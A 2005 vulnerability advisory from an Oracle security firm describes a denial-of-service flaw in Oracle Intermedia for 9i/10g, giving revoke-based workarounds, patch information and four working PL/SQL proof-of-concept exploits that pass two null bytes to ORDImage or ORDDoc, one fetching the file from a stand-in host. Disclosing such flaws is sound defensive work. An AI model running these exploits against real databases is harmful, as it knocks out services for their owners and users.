Services
Oracle Audit / Hardening
Security Training
Consulting

Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts

News & Events
Events
News

Company
Contact
People
Partner
Impressum
Sitemap


Search



Search Red-Database-Security
Denial of Service via Oracle Intermedia in Oracle 9i / 10g

Name Denial of Service via Oracle Intermedia in Oracle 9i / 10g (D.o.S)
Systems Affected Oracle 9i / 10g
Severity Medium Risk
Category Denial of Service
Vendor URL http://www.oracle.com/
Credit Esteban Martinez Fayo (<argeniss>dot<com)
Exploit http://www.argeniss.com
Date 18 Apr 2005 (V 1.00)

Details

The following proof of concept exploit code is doing a denial of serivce attack. The Oracle process spins and the CPU is consuming 100%.


Workarounds
REVOKE EXECUTE ON ORDSYS.ORDIMAGE FROM PUBLIC FORCE;
REVOKE EXECUTE ON ORDSYS.ORDDOC FROM PUBLIC FORCE;

Example
-- Exploit 1: Explicitly setting two null bytes to localData property
DECLARE
Image1 ORDSYS.ORDImage;
BEGIN
Image1 := ORDSYS.ORDImage.init();
Image1.source.localData := TO_BLOB(HEXTORAW('0000'));
Image1.setProperties;
END;
/

-- Exploit 2: Load from filesystem
DECLARE
Image ORDSYS.ORDImage;
BEGIN
Image := ORDSYS.ORDImage.init('file', 'MEDIA_DIR', 'file_with_two_null_bytes.jpg');
Image.setProperties;
END;
/

-- Exploit 3: Load from web
DECLARE
Image ORDSYS.ORDImage;
BEGIN
Image := ORDSYS.ORDImage.init('HTTP', 'www.evildba.com/',
'file_with_two_null_bytes.jpg');
Image.setProperties;
END;
/

-- Exploit 4: Explicitly setting two null bytes to localData property of ORDDoc type.
DECLARE
Doc ORDSYS.ORDDoc;
X RAW(30000);
BEGIN
Doc := ORDSYS.ORDDoc.init();
Doc.source.localData := TO_BLOB(HEXTORAW('0000'));
Doc.setProperties (X, FALSE);
END;
/



Patch Information
Revoke the grants or apply the patches mentioned in Oracle Critical Patch Update April 2005.


2005 by Red-Database-Security GmbH - last update 29-april-2005

2005 by Red-Database-Security GmbH - last update 02-nov-2005

Definition Exploit
An exploit is a common term in the computer security to refer to a piece of software that take advantage of a bug or vulnerability leading to a privilege escalation or d.o.s. on a computer system.
Computer security experts are using exploit code to test if a patch is working properly.